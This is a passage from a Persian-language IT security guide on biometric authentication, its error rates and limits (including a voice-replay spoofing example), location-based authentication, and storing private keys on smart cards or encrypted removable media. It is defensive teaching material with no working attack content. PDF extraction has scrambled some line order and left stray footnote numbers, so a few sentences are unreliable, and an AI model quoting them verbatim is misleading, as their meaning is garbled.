ﻓﻨﻮﻥ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ "ﺗﺸﺨﻴﺺ ﺑﻌﺪﻱ" ﻭ ﻧﻴﺰ "ﺗﺸﺨﻴﺺ ﻗﻄﻌـﻲ" ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺑﻌﺪﻱ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ :ﺍﻭﻟﻴﻦ ﺑﺎﺭﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﻣـﻲﺷـﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﺑﻴﻮﻣﺘﺮﻳـﻚ ﺍﻭ ﺛﺒـﺖ
ﻼ ﺛﺒﺖ ﺷـﺪﻩ ﻣﻘﺎﻳـﺴﻪ ﻣـﻲﮔـﺮﺩﺩ .ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ ﺩﺭ ﻣﻲﺷﻮﺩ .ﺩﺭ ﻭﺭﻭﺭﺩﻫﺎﻱ ﺑﻌﺪﻱ ،ﺑﻴﻮﻣﺘﺮﻳﻚ ﺟﺪﻳﺪ ﺑﺎ ﺁﻧﭽﻪ ﻗﺒ ﹰ
ﺗﺸﺨﻴﺺ ﻗﻄﻌﻲ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺰﺭﮒ ﺑﺮﺍﻱ ﺗﻨﺎﻇﺮ ﻧﺎﻣﻬﺎ ﺑﺎ ﺑﻴﻮﻣﺘﺮﻳﻚﻫﺎ ﺍﻳﺠﺎﺩ ﺷﻮﺩ .ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ،ﭘﻠـﻴﺲ ﻓـﺪﺭﺍﻝ
ﺁﻣﺮﻳﻜﺎ ) (FBIﺑﻪ ﭼﻨﻴﻦ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻣﺠﻬﺰ ﺍﺳﺖ ﻛﻪ ﻳﻜﻲ ﺍﺳﺎﻣﻲ ﺭﺍ ﺑﺎ ﺍﺛﺮ ﺍﻧﮕﺸﺘﺎﻥ ﻭ ﺩﻳﮕﺮﻱ ﺑﺎ ﻋﻨﺎﺻﺮ DNAﺗﻄﺒﻴﻖ ﻣﻲﺩﻫﺪ.
ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﻧﺸﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﺩﻭ ﻣﺰﻳﺖ ﻭﺍﺿﺢ ﺩﺍﺭﺩ .ﺁﻧﻬﺎ ﻓﺮﺍﻣﻮﺵ ﻭ ﻳﺎ ﮔﻢ ﻧﻤﻲﺷـﻮﻧﺪ،
ﻭ ﺑﺮﺍﺣﺘﻲ ﻧﻴﺰ ﻗﺎﺑﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻦ ،ﻛﭙﻲﺑﺮﺩﺍﺭﻱ ،ﻭ ﻳﺎ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺎﺷﻨﺪ .ﻭﻟﻲ ﺍﻧﺘﻘﺎﻝ ﺗﻜﻨﻮﻟﻮﮊﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺯ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻬﺎ ﺑﻪ ﺳﻄﺢ
ﺑﺎﺯﺍﺭ ﻣﺸﻜﻞ ﺍﺳﺖ .ﺩﺭ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ) False Positiveﺍﺷـﺘﺒﺎﻩ ﻣﺜﺒـﺖ( ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ،ﻛـﻪ ﺩﺭ ﺁﻥ ﺳﻴـﺴﺘﻢ
ﺗﻄﺒﻴﻘﻲ ﺭﺍ ﻛﻪ ﻧﺒﺎﻳﺪ ﺍﻋﻼﻡ ﻛﻨﺪ ،ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ .ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ) False Negativeﺍﺷﺘﺒﺎﻩ ﻣﻨﻔﻲ( ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻛﻪ ﺩﺭ ﺁﻥ ﺳﻴﺴﺘﻢ
ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﻭ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﻫﺴﺘﻨﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻳﻚ ﺷﺨﺺ ﻭﺍﺣﺪ ﻣﻲﺑﺎﺷـﻨﺪ .ﺑـﺮﺍﻱ ﻛـﺎﻫﺶ ﺍﻣﻜـﺎﻥ ﺗﻄﺒﻴﻘﻬـﺎﻱ
ﻻ ﺍﺯ
ﺍﺷﺘﺒﺎﻩ ،ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ،ﻣﻌﻴﺎﺭ ﺯﻳﺴﺘﻲ ﺭﺍ ﺑﺎ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﺎ ﻧﺸﺎﻥ ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻣﻌﻤـﻮ ﹰ
ﻛﺎﺭﺑﺮ ﺧﻮﺍﺳﺘﻪ ﻣﻲﺷﻮﺩ ﮐﻪ ﻳﻚ ﻛﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺨﻔﻲ ﻣﺜﻞ PINﺭﺍ ﺗﺎﻳﭗ ﻛﻨﺪ ﻭ ﺳﭙﺲ ﻳﻚ ﻧﻤﻮﻧﺔ ﺑﻴـﻮﻣﺘﺮﻳﻜﻲ ،ﻣﺜـﻞ ﺣﺎﻟـﺖ ﺻـﺪﺍﻳﺶ ﺭﺍ
ﺍﺭﺍﺋﻪ ﺩﻫﺪ .ﺳﻴﺴﺘﻢ ﺍﺯ ﺁﻥ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﻳﻚ ﭘﺮﻭﻧﺪﺓ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ،ﻭ ﺳﭙﺲ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺭﺍ ﺑﺎ ﺍﻟﮕﻮﻱ ﺫﺧﻴﺮﻩﺷـﺪﻩ
ﻣﻘﺎﻳﺴﻪ ﻣﻲﻧﻤﺎﻳﺪ .ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ،ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ -ﺑﺠﺎﻱ ﺗﻤﺎﻡ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ -ﺑـﺎ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﻣﻘـﺎﺩﻳﺮ ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺫﺧﻴﺮﻩﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﺪ.
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﺩﻗﻴﻖ ﻧﻴﺴﺘﻨﺪ؛ ﭼﺮﺍﮐﻪ:
• ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﺨﺺ ﺑﺨﻮﺍﻫﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﺩ ،ﻣﺸﺨﺼﺎﺕ ﺑﻴﻮﻣﺘﺮﻳﻜﻲ ﻭﻱ ﺑﺎﻳﺪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺷﺪ؛
• ﺍﮔﺮ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻜﻲ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﺍﺳﺎﺱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺑﻲﺍﺭﺯﺵ ﺧﻮﺍﻫﺪ ﺷﺪ؛ ﻭ
• ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﺑﻄﻮﺭ ﺧﺎﺹ ﺣﻔﺎﻇﺖ ﻧﺸﻮﺩ ،ﺗﺠﻬﻴﺰﺍﺕ ﻧﺴﺒﺖ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﺗﺤﺮﻳﻒ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﻨﺪ ﺑـﻮﺩ.
ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻳﻚ ﺩﺯﺩ ﺑﺎﻫﻮﺵ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﺍﺳﺎﺱ ﺻـﺪﺍ ،ﺑﺘﻮﺍﻧـﺪ ﺑـﺎ ﺿـﺒﻂ ﻛـﺮﺩﻥ ﺻـﺪﺍﻱ
ﺷﺨﺺ ﻣﺠﺎﺯ )ﻭﻗﺘﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻣﻲﮔﻮﻳـﺪ( ،ﺑﺎﺯ ﮔﺮﺩﺍﻧﺪﻥ ﻧﻮﺍﺭ ﺑﻪ ﻋﻘﺐ ،ﻭ ﺳﭙﺲ ﭘﺨﺶ ﻣﺠﺪﺩ ﺻﺪﺍﻱ ﺿﺒﻂ ﺷـﺪﻩ ،ﺁﻥ ﺳﻴـﺴﺘﻢ ﺭﺍ
ﻓﺮﻳﺐ ﺩﻫﺪ.
ﻳﻚ ﺷﻜﻞ ﺳﺎﺩﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺮ ﺍﺳﺎﺱ ﻣﺤﻞ ،ﺩﺍﺷﺘﻦ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﭘﺎﻳﺎﻧﺔ ﻣﺨﺼﻮﺻﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻳﻚ ﻋﻤـﻞ ﺧـﺎﺹ ﺑﺎﺷـﺪ.
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺍﺯ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺍﻣﺘﻴﺎﺯﺍﺗﻲ ﻣﺤﺮﻭﻡ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ .ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ" ،ﻣﻮﻗﻌﻴﺖ" ﻫﻨﻮﺯ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ
ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﻧﺮﻓﺘﻪ ﺍﺳﺖ.
130 Realtime
131 Challenge Data
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣١٨
ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ .ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﺩﻳﮕﺮﺍﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ،ﺩﺯﺩﻱ ،ﻭ .٢
ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﺑﻪ ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺎﺯ ﺍﺳﺖ ،ﻛﻪ ﺷﺨﺼﻲ ﻛﻪ ﻫﻮﻳﺖ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﺪ ﺑﺘﻮﺍﻧﺪ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ ﻛﻪ ﻧﺎﻡ ﺭﻭﻱ ﻛﻠﻴﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﻧﺎﻡ .٣
ﺻﺤﻴﺢ ﺻﺎﺣﺐ ﻓﻌﻠﻲ ﺁﻥ ﻛﻠﻴﺪ ﺍﺳﺖ.
ﺍﮔﺮ ﻛﻠﻴﺪﻫﺎ ﺑﺪﻭﻥ ﺩﻗﺖ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﺘﻨﺎﻇﺮ ﻣﺤﺎﺳـﺒﻪ ﻛﻨـﺪ .ﭼﻨﺎﻧﭽـﻪ
ﻛﻠﻴﺪﻫﺎ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﺫﺧﻴﺮﻩ ﻧﺸﻮﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﺯﺩﺩ.
ﻻ
ﻫﺮﭼﻨﺪ ﺩﺭ ﻳﻚ ﻧﮕﺎﻩ ﺳﻄﺤﻲ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺩﻩ ﺑﻨﻈﺮ ﻣﻲﺭﺳﻨﺪ ،ﺍﻣﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ .ﺍﺯ ﺍﻳﻦ ﺑﺪﺗﺮ ﺍﻳﻨﻜﻪ ﻣﻌﻤـﻮ ﹰ
ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﺮﺩ ﻭ ﺗﺸﺨﻴﺺ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ ﺍﻣـﻦﺗـﺮ ﻫـﺴﺖ ﻳـﺎ
ﻧﻴﺴﺖ.
ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻭ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪﻫﺎ ﭼﻨﺪ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻳﻦ ﺭﺍﻫﻬﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺘﺮﺗﻴﺐ ﻛﺎﻫﺶ ﺍﻳﻤﻨﻲ ﺍﺯ ﻗﺮﺍﺭ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
ﻳﻚ ﻛﻤﻚﭘﺮﺩﺍﺯﻧﺪﺓ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﺜﻞ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺑﻜـﺎﺭ ﺑﺮﻳـﺪ .ﻳـﻚ ﻛـﺎﺭﺕ ﻫﻮﺷـﻤﻨﺪ ﺳـﺎﺯﮔﺎﺭ ﺑـﺎ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ،ﺩﺍﺭﺍﻱ ﻳـﻚ .١
ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ،ﻳﻚ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪﺓ ﺍﻋﺪﺍﺩ ﺗﺼﺎﺩﻓﻲ ،ﻭ ﺗﻮﺍﺑﻊ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺍﻭﻟﻴﺔ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳـﺖ ،ﻭ ﻫﻤﭽﻨـﻴﻦ
ﻳﻚ ﺣﺎﻓﻈﻪ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻠﻴﺪﻫﺎ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﺪ .ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﻫﻴﭽﮕـﺎﻩ ﺍﺯ
ﻛﺎﺭﺕ ﺧﺎﺭﺝ ﻧﻤﻲﺷﻮﺩ .ﭼﻨﺎﻧﭽﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺨﺸﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻣﻀﺎ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ،ﺁﻥ ﺑﺨﺶ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳـﺪ ﺑـﻪ ﻛـﺎﺭﺕ
ﻣﻨﺘﻘﻞ ﺷﻮﺩ ،ﻭ ﺳﭙﺲ ﺟﻮﺍﺏ ﺍﻣﻀﺎ ﺷﺪﻩ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﻩ ﺍﺯ ﺭﻭﻱ ﻛﺎﺭﺕ ﻣﻨﺘﻘﻞ ﻣﻲﮔﺮﺩﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻛﻠﻴـﺪ
ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﮕﺮ ﺁﻧﻜﻪ ﺧﻮﺩﺷﺎﻥ ﻣﺎﻟﻜﻴﺖ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻨﺪ .ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﮐﺪﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ،ﮔﻴﺮﻧـﺪﻩﻫـﺎﻱ
ﺍﺛﺮ ﺍﻧﮕﺸﺖ ،ﻳﺎ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ ﺗـﺎ ﻛـﺎﺭﺕ ﺗﻨﻬـﺎ ﺩﺭﺻـﻮﺭﺗﻲ
ﺍﻣﻀﺎ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﻛﻪ ﺩﺍﺭﻧﺪﺓ ﻛﺎﺭﺕ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﻼ ﺷﻜﺴﺖﭘﺬﻳﺮ ﻣـﻲﺑﺎﺷـﻨﺪ .ﺍﮔـﺮ ﻛـﺎﺭﺕ ﮔـﻢ ﺷـﻮﺩ، ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﺯ ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﻛﺎﻣ ﹰ
ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ ،ﻭ ﻳﺎ ﺁﺳﻴﺐ ﺑﺒﻴﻨﺪ ،ﻛﻠﻴﺪﻫﺎﻱ ﺭﻭﻱ ﺁﻥ ﺍﺯ ﺑﻴﻦ ﻣﻲﺭﻭﻧﺪ ﻭ ﺩﻳﮕﺮ ﺩﺭ ﺩﺳﺘﺮﺱ ﻛﺎﺭﺑﺮ ﻧﻴﺴﺘﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻭﻱ
ﻛﺎﺭﺗﻬﺎ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ﻧﻮﻋﻲ ﺳﻴﺴﺘﻢ ﻛﭙـﻲ ﻛـﺮﺩﻥ ﺍﺯ
ﺭﻭﻱ ﻛﺎﺭﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ ﺗﺎ ﺍﺯ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻥ ﻛﻠﻴﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﻛﻨـﻴﻢ .ﻫﺮﭼﻨـﺪ ﺍﮔـﺮ ﺍﻳـﻦ ﻛﻠﻴـﺪﻫﺎ ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ ﺍﻣـﻀﺎﻫﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﻧﻴﺴﺖ .ﺍﮔﺮ ﻳﻚ ﻛﻠﻴﺪ ﺍﻣﻀﺎ ﻛﻨﻨﺪﻩ ﮔﻢ ﺷﻮﺩ ،ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻚ ﻛﻠﻴـﺪ ﺍﻣـﻀﺎ ﻛﻨﻨـﺪﻩ ﺟﺪﻳـﺪ
ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ،ﻭ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺯ ﺑﻴﻦ ﻧﻤﻲﺭﻭﺩ .ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺩﺭ ﻣﻘﺎﺑﻞ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦ ﻧﻴﺴﺘﻨﺪ.
ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻛﻮﭼﻜﻲ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ :ﻧﻘﺎﻳﺺ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﺯ
ﻛﻠﻴﺪ ﺷﻮﺩ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﻳﻚ ﻛﺎﺭﺕ ﺭﺍ ﺗﺤﻠﻴﻞ ﻛﺮﺩ ﻭ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻭﻱ ﺁﻧـﺮﺍ ﺑﺎﺯﻳـﺎﺑﻲ ﻧﻤـﻮﺩ .ﺩﺭ ﻫـﺮ ﺻـﻮﺭﺕ
ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻤﻦﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ.
ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺭﻭﻣﻴﺰﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ Flashﺫﺧﻴﺮﻩ ﻛﻨﻴﺪ .ﺯﻣﺎﻧﻴﻜﻪ .٢
ﻛﻠﻴﺪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ ،ﻛﺎﺭﺑﺮ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﺭﺍ ﻭﺍﺭﺩ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺭﺍﻳﺎﻧﻪ ﻣﻲﻛﻨﺪ ،ﺭﺍﻳﺎﻧﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ
ﻣﻲﺧﻮﺍﻧﺪ ،ﻛﻠﻴﺪ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ ،ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﺍﺯ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺖﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ .ﺍﻳﻦ ﺗﻜﻨﻴـﻚ
